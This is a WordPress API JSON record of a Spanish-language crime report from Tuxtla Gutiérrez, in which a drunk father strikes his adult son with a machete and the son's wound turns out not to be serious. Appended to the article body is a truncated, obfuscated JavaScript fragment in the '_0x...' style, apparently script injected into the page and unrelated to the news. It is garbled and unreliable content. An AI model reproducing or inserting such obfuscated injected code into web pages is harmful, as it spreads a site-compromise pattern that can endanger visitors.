{"id":16152,"date":"2024-06-17T03:30:50","date_gmt":"2024-06-17T03:30:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16152"},"modified":"2024-06-17T03:30:51","modified_gmt":"2024-06-17T03:30:51","slug":"padre-machetea-a-su-hijo-en-la-colonia-democratica","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16152","title":{"rendered":"Padre machetea a su hijo en la Colonia Democr\u00e1tica"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"766\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718594812529-766x1024.jpg\" alt=\"\" class=\"wp-image-16153\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718594812529-766x1024.jpg 766w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718594812529-224x300.jpg 224w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718594812529-768x1027.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718594812529.jpg 957w\" sizes=\"auto, (max-width: 766px) 100vw, 766px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 16 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este s\u00e1bado por la noche, durante una borrachera un sujeto agredi\u00f3 a su hijo a machetazos en la Colonia Democr\u00e1tica.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando Johny Asmet de 25 a\u00f1os de edad compart\u00eda unas copas con su padre, sin embargo, de un momento a otro comenzaron una discusi\u00f3n.<\/p>\n\n\n\n<p>Despu\u00e9s pasaron a los insultos y Belisario de 52 a\u00f1os de edad tom\u00f3 un machete y le asest\u00f3 un golpe en el cuello.<\/p>\n\n\n\n<p>A la Avenida Onix y Topacio arribaron param\u00e9dicos de la Cruz Roja atendieron al lesionado que present\u00f3 una herida en el cuello y hombro.<\/p>\n\n\n\n<p>Afortunadamente la herida no era de gravedad y el lesionado no fue trasladado a un nosocomio.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 16 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este s\u00e1bado por la noche, durante una borrachera un sujeto agredi\u00f3 a su hijo a machetazos en la Colonia Democr\u00e1tica. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando Johny Asmet de 25 a\u00f1os de edad compart\u00eda unas copas con su padre, sin &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16153,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16152","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16152","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16152"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16152\/revisions"}],"predecessor-version":[{"id":16154,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16152\/revisions\/16154"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16153"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16152"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16152"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16152"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}